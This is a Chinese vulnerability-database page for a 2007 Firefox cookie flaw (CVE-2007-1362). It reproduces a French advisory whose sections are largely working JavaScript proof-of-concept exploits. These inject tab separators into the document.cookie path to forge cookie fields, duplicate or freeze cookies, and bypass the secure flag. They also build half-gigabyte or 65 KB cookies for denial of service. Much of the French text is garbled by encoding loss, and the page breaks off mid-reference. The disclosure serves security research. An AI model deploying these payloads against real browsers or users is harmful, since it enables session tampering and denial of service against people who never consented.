Mozilla cookie远程拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112385 漏洞类型 输入验证
发布时间 2007-03-08 更新时间 2007-09-05
CVE编号 CVE-2007-1362 CNNVD-ID CNNVD-200705-564
漏洞平台 Linux CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/29720
https://www.securityfocus.com/bid/22879
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200705-564
|漏洞详情
MozillaFirefox/SeaMonkey/Thunderbird都是Mozilla发布的WEB浏览器和邮件新闻组客户端产品。Mozilla客户端处理cookie存在两个漏洞。第一个漏洞是没有对cookie路径参数执行任何长度检查,导致受害用户的浏览器可能在运行期间使用过多的内存,浪费过多的磁盘空间存储cookie直至过期。HTTP服务器所发送的Cookie应受HTTP头大小的合理限制,但通过JavaScript所创建并使用document.cookie所添加的cookie可能拥有任意长度的路径,甚至为数十兆。第二个漏洞是没有检查cookie路径和名称值中是否存在用于内部cookie存储的分隔符,如果存在的话可能导致之后解释cookie数据混乱,其中的一种异常是不安全的站点可能创建"安全"的cookie。
|漏洞EXP
source: http://www.securityfocus.com/bid/22879/info

Mozilla Firefox is prone to a remote denial-of-service vulnerability.

An attacker may exploit this vulnerability to cause Mozilla Firefox to crash, resulting in denial-of-service conditions.

Little is known regarding this vulnerability; this BID will be updated when more information is disclosed.

Mozilla Firefox 2.0.0.2 is prone to this issue; other versions may also be affected.

Attackers may be able to bypass cookie domain and path restrictions, but this has not been confirmed. 

____________________________________________________________________________________________________

Mozilla Firefox ('document.cookie') Path Argument Multiple Vulnerabilities
____________________________________________________________________________________________________

Advisory   : ADV001a
Risk       : Moderate
Credit     : Nicolas DEROUET (nicolas.derouet[gmail]com)
Date       : 2007-03-08		  
Software   : Mozilla Firefox version 2.0.0.2 (Other versions or products may be also affected)
____________________________________________________________________________________________________

I think identify multiple vulnerabilities in Mozilla Firefox (default installation) which could be
exploited by malicious users to bypass the same origin policy, cause a denial of service and
conduct other attacks by writing the path of 'document.cookie' with tabulations or/and a large size.



Description (in French, sorry)
User Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2
____________________________________________________________________________________________________
 
#1 Introduction
____________________________________________________________________________________________________

Un cookie, dans le fichier 'cookies.txt', est composée sept champs : le domaine du cookie, le
drapeau pour savoir s'il peut êe lu par les autres machines du mê domaine, le chemin (path), 
le drapeau de séritéla date d'expiration, le nom du cookie et la valeur du cookie.

Si nous exétons ce code JavaScript :
  URL         : http://127.0.0.1/
  JAVASCRIPT  : document.cookie = 'DEMO=A; domain=127.0.0.1; path=/; expires=Mon, 03-Sep-2007 00:00:01 GMT;';

Nous obtiendrons ceci dans le fichier 'cookies.txt' :
  COOKIES.TXT : 127.0.0.1  FALSE / FALSE 1181270854  DEMO  A

Dans cette analyse, nous allons nous intésséarticulièment au 'PATH' du cookie.

  
  
     
____________________________________________________________________________________________________
 
#2 Injection de donnéavec la variable path
____________________________________________________________________________________________________


a) Préntation
---------------

Les champs dans le fichier 'cookies.txt' sont sérépar des tabulations (\t or \x09) hors le
'PATH' dans 'document.cookie' autorise l'utilisation des tabulations.

Par exemple, en modifiant le 'PATH' avec cette valeur '/\x09FALSE\x091188777601\x09B\x09123', 
j'obtiens ceci (mon cookie d'origine a pour valeur est 'DEMO=A')


  URL         : http://127.0.0.1/index.htm
  JAVASCRIPT  : document.cookie = 'DEMO=A; domain=127.0.0.1; path=/\x09FALSE\x091188777601\x09B\x09123; expires=Mon, 03-Sep-2007 00:00:01 GMT;';
  COOKIES.TXT : 127.0.0.1 FALSE / FALSE 1188777601 B 123 FALSE 1181270854 DEMO A
                                ^----------------------^                   |   |
                                     PATH INJECTION                     NAME   VALUE


Sur cette page http://127.0.0.1/index.htm, la valeur de 'location.pathname' est éle à/'. Donc,
mon cookie est inutilisable (pour le moment) car je me situe au mauvais chemin (PATH). 
 
En redérrant mon navigateur, je peux voir que mon cookie est utilisable sur la page 
http://127.0.0.1/index.htm, il s'est transforméour devenir 'B=123 FALSE 1181270854 DEMO A'.


  COOKIES.TXT : 127.0.0.1 FALSE / FALSE 1188777601 B 123 FALSE 1181270854 DEMO A  
                                |                  | ^-------------------------^ 
                             PATH               NAME           VALUE

 
Pour conclure, nous pouvons voire que n'importe quelle utilisateur malicieux peut mettre ce code
en place trèfacilement et que ce code prénte peu de danger dans ce contexte car il modifie la
variable cookie de son propre domaine.


 
b) Créion de cookies identiques 
---------------------------------


Si nous exétons ce code :
  document.cookie = 'id=6; domain=127.0.0.1; path=/; expires=Mon, 03-Sep-2007 00:00:01 GMT;';  
  document.cookie = 'id=7; domain=127.0.0.1; path=/; expires=Mon, 03-Sep-2007 00:00:01 GMT;';  
  document.cookie = 'id=8; domain=127.0.0.1; path=/; expires=Mon, 03-Sep-2007 00:00:01 GMT;';
  document.cookie = 'id=9; domain=127.0.0.1; path=/; expires=Mon, 03-Sep-2007 00:00:01 GMT;';

Nous aurons uniquement un seul cookie avec une variable id à. Par contre avec la
vulnébilitéréntéi-dessus, nous pouvons cré plusieurs cookies identiques.
Voici un code d'exemple :


  URL         : http://127.0.0.1/index.htm 
  JAVASCRIPT  : 
    document.cookie = 'B=123\x09FALSE\x091188777601\x09id\x098; domain=127.0.0.1; path=/; expires=Wed, 05-Sep-2007 01:00:00 GMT;';
    document.cookie = 'id=8; domain=127.0.0.1; path=/\x09FALSE\x091188777601\x09B\x09123; expires=Mon, 03-Sep-2007 00:00:01 GMT;'; 
  COOKIES.TXT :
    127.0.0.1 FALSE [/] FALSE 1181270854 [B] [123 FALSE 1181270854 id 8]
    127.0.0.1 FALSE [/ FALSE 1181270854 B 123] FALSE 1181270854 [id] [8] 


En redérrant le navigateur, nous aurons deux cookies identiques.
Prenons maintenant un deuxiè exemple,


  URL         : http://127.0.0.1/index.htm 
  JAVASCRIPT  :  
    document.cookie = 'BUG=YES; domain=127.0.0.1; path=/\x09FALSE\x091188777601\x09PREF\x092; expires=Mon, 03-Sep-2007 00:00:01 GMT;';  
    document.cookie = 'PREF=1; domain=127.0.0.1; path=/; expires=Wed, 05-Sep-2007 01:00:00 GMT;';
  COOKIES.TXT :
    127.0.0.1 FALSE [/] FALSE 1181270854 [PREF] [1]
    127.0.0.1 FALSE [/ FALSE 1181270854 PREF 2] FALSE 1181270854 [BUG] [YES]
    
    
Si on redérre le navigateur, 'document.cookie' donnera 'PREF=1; PREF=2 FALSE 1188777601 BUG YES'.
Nous allons maintenant modifier le cookie PREF (je rappelle que nous avons deux cookies avec un
nom identique 'PREF')


  URL         : http://127.0.0.1/index.htm
  JAVASCRIPT  :
    document.cookie = 'PREF=3; domain=127.0.0.1; path=/; expires=Mon, 03-Sep-2007 00:00:01 GMT;';
  COOKIES.TXT :
    127.0.0.1 FALSE / FALSE 1181270854 PREF 1
    127.0.0.1 FALSE / FALSE 1181270854 PREF 3     


A ce moment, 'document.cookie' est éle àPREF=1; PREF=3'. Nous pouvons voir que la modification
de la valeur cookie 'PREF' impacte sur une seule valeur et non sur les deux. J'ai voulu savoir 
comment é interpré la valeur du cookie du cotéerveur (exemple PHP) et du cotélient. 
Pour le cotélient, j'ai répé sur internet une fonction JavaScript qui permet de répér la
valeur d'un cookie passén paramèe.

  JAVASCRIPT (cotélient)
    function getCookieVal (c_name)
    {
      if (document.cookie.length>0)
      {
        c_start=document.cookie.indexOf(c_name + "=")
        if (c_start!=-1)
        { 
          c_start=c_start + c_name.length+1 
          c_end=document.cookie.indexOf(";",c_start)
          if (c_end==-1) c_end=document.cookie.length
          return unescape(document.cookie.substring(c_start,c_end))
        } 
      }
      return ""
    }

  PHP (cotéerveur)
    <?php
      echo $_COOKIE['PREF'];
    ?>
    
Géralement ils prennent la premiè valeur qu'il trouve. Ces deux cas me disent que la valeur de 
PREF est 1. Ainsi malgrées modifications apporté àa valeur de PREF (mise àa valeur 3), elle
sera trèsouvent interprée du cotélient et du cotéerveur comme ayant la valeur 1.

Némoins, si on redérre le navigateur alors document.cookie donnera 'PREF=3; PREF=1' et la 
fonction getCookieVal('PREF') donnera '3' avec aucune possibilitée modifier la valeur de 3.

Notre exemple ici n'est pas trop dangereux et n'est pas complèment dramatique mais avec des
autres variables tel que les prérences (par exemple : notre panier pour des sites commerciaux), 
le PHPSESSID, etc. cela pourrait devenir trèennuyeux pour un utilisateur.


 
c) By passer la restriction SECURE
-----------------------------------

Admettons que nous sommes sur le site http://www.monsite.fr/, il est normalement interdit de cré
un cookie avec l'option secure (option rérvépour les protocoles sérisécomme HTTPS)

  URL        : http://www.monsite.fr/index.htm
  JAVASCRIPT : 
    document.cookie = 'PREF=1; domain=.monsite.fr; path='/'; expires=Mon, 03-Sep-2007 00:00:01 GMT; secure;';

Le réltat est impossible.
Cependant grâ à'injection dans la variable 'PATH', nous pouvons cré un cookie afin de sauter
cette restriction. 

  URL        : http://www.monsite.fr/index.htm
  JAVASCRIPT :
    var path = '/\x09TRUE\x091188777601\x09PREF\x092'; // TRUE = secures
    document.cookie = 'PREF=1; domain=.monsite.fr; path='+path+'; expires=Mon, 03-Sep-2007 00:00:01 GMT;';
  
Dans l'exemple ci-dessus document.cookie donnera 'PREF=2 FALSE 1188777601 PREF 1'.
L'injection de donné par le 'PATH' ne nous donne pas la possibilitée donner une valeur souhaitéàotre cookie car les vrais arguments ( FALSE 1188777601 PREF 1) vont se greffer àa fin.

Cependant, notre cookie pourrait trèbien éaser et figer la valeur (cf #1b) d'un cookie sériséréàartir de httpS://www.monsite.fr/ ou httpS://sous.domaine.monsite.fr/. 



d) Conclusion
-------------

Nous pouvons voir ci-dessus une liste non-exhaustive d'exemples qui permettent d'exploiter cette
faille. Avec d'autre exemple, j'ai pu interagir sur le gestionnaire de cookie (cookie manager) afin
de ne pas afficher les valeurs d'un cookie spéalement conçou de rendre impossible la suppression
d'un cookie avec l'option 'Supprimer le cookie' ou la touche supprimer. Je n'ai pas poussées tests
plus loin mais je me pense qu'il y a une multitude d'utilisation possible surtout additionner avec 
une autre vulnébilitémportante préntédans le paragraphe suivant ...




____________________________________________________________________________________________________
 
#3 Aucune restriction de taille pour 'PATH'
____________________________________________________________________________________________________

A y rééir, j'aurais du appelée paragraphe : "Manger de trop gros cookie fait grossir !".  

Firefox ne donne aucune limite de taille pour la variable path dans le document.cookie, ce qui 
permet de cré des cookies de trègrande taille.
 
Cette vulnébilitéeut provoquer et êe utiliser pour des attaques de type dé de service (DoS)
de diffénte faç :

  1) Direct, on alloue un grand nombre de donné nous avons un DoS (exemple ci-dessous)
  2) Indirect, on créplusieurs cookie de moyenne taille
     nous aurons un espace disque utilisét quand firefox redérrera
     il utilisera une grosse partie de la méire pour les cookies.  
  
  URL        : http://127.0.0.1/index.htm
  JAVASCRIPT :  
    var path = '/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'; // 32
    for (i=0; i<24; i++) { path = path + path; }   // 32 x 2^22 = 536 870 912 
    document.cookie = 'SIZE='+path.length+'; domain=127.0.0.1; path='+path+'; expires=Mon, 03-Sep-2007 00:00:01 GMT;';
    alert ('Cookie : ' +path.length+' octets');
  
En modifiant le code (la valeur limite de i à1), j'ai rési àré un cookie de 124 Mo sur mon
ordinateur et j'ai pu constater que Firefox utilisélus de 124 Mo de méire.




____________________________________________________________________________________________________
 
#3 Utilisation des deux vulnébilité____________________________________________________________________________________________________

Grâ àes deux vulnébilité nous avons la possibilitée désser les restrictions de taille
sur les champs suivants : le chemin (path), le drapeau de séritéla date d'expiration, le nom
du cookie et la valeur du cookie.

Prenons un exemple avec le nom et la valeur du cookie,

La somme de la taille des variables NOM et VALEUR d'un cookie est limitéà096 caractès.
En injectant des donné dans ces variables, nous pouvons leur attribuer une valeur supéeure àeur taille maximale autorisé Dans l'exemple, ci-dessous on injecte plus de 65536 caractès.
Lorsqu'on redérrera le navigateur, afin que la valeur du cookie soit active, nous ne pouvons plus
nous connecter sur le serveur car l'argument cookie de notre requê HTTP est trop grand.
(sympa pour des admins qui veulent bannir certains utilisateurs :)


  var data = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'; // 32
  for (i=0; i<11; i++) { data = data + data; }   // 32 x 2^11 = 65536 
  var path = '/\x09FALSE\x091188777601\x09DATA\x09' + data;
  document.cookie = 'DEMO=7; domain=127.0.0.1; path='+path+'; expires=Mon, 03-Sep-2007 00:00:01 GMT;';
  alert ('Cookie Data is injected ! Please restart Firefox.');
  



____________________________________________________________________________________________________

#4 Existe t-il un risque overflow ?
____________________________________________________________________________________________________

Sincèment, je ne me suis pas penchéur cette question àa recherche de code qui permettrait de
déntrer l'utilisation d'un overflow. Je pense que les vulnébilitéprénté ont déntréue nous pouvons autoriser certains champs (5 champs) àésser leur taille normale grâ à'injection de donné dans la variable 'PATH'. Cependant, si un overflow peut êe utiliséans
cet exemple, il pourrait s'activer au dérrage de Firefox.

NB: Si vous résissez àéntrer l'utilisation d'un overflow merci de me tenir informer.
    (nicolas.derouet[gmail]com)



____________________________________________________________________________________________________

#5 Solution
____________________________________________________________________________________________________

Les solutions sont assez simples.

Pour la premiè vulnébilitéil faudrait êe plus restrictif sur les caractès autorisédans
les diffénts champs du document.cookie par exemple interdire les tabulations pour le 'PATH'.

Pour la deuxiè vulnébilitéil faudrait limiter la taille du 'PATH'. 




Nicolas DEROUET (nicolas.derouet[gmail]com)
____________________________________________________________________________________________________
|受影响的产品
Redhat Enterprise Linux WS 4 Redhat Enterprise Linux WS 3 Redhat Enterprise Linux WS 2.1 IA64 Redhat Enterprise Linux WS 2.1 Redhat Enterprise Linux Optional Productivity Application 5 s
|参考资料

来源:TA07-151A
名称:TA07-151A
链接:http://www.us-cert.gov/cas/techalerts/TA07-151A.html
来源:www.mozilla.org
链接:http://www.mozilla.org/security/announce/2007/mfsa2007-14.html
来源:issues.rpath.com
链接:https://issues.rpath.com/browse/RPL-1424
来源:XF
名称:mozilla-doccookie-dos(34613)
链接:http://xforce.iss.net/xforce/xfdb/34613
来源:UBUNTU
名称:USN-468-1
链接:http://www.ubuntu.com/usn/usn-468-1
来源:SECTRACK
名称:1018163
链接:http://www.securitytracker.com/id?1018163
来源:SECTRACK
名称:1018162
链接:http://www.securitytracker.com/id?1018162
来源:BID
名称:24242
链接:http://www.securityfocus.com/bid/24242
来源:BID
名称:22879
链接:http://www.securityfocus.com/bid/22879
来源:BUGTRAQ
名称:20070531FLEA-2007-0023-1:firefox
链接:http://www.securityfocus.com/archive/1/archive/1/470172/100/200/threaded
来源:REDHAT
名称:RHSA-2007:0402
链接:http://www.redhat.com/support/errata/RHSA-2007-0402.html
来源:REDHAT
名称:RHSA-2007:0401
链接:http://www.redhat.com/support/errata/RHSA-2007-0401.html
来源:REDHAT
名称:RHSA-2007:0400
链接:http://www.redhat.com/support/errata/RHSA-2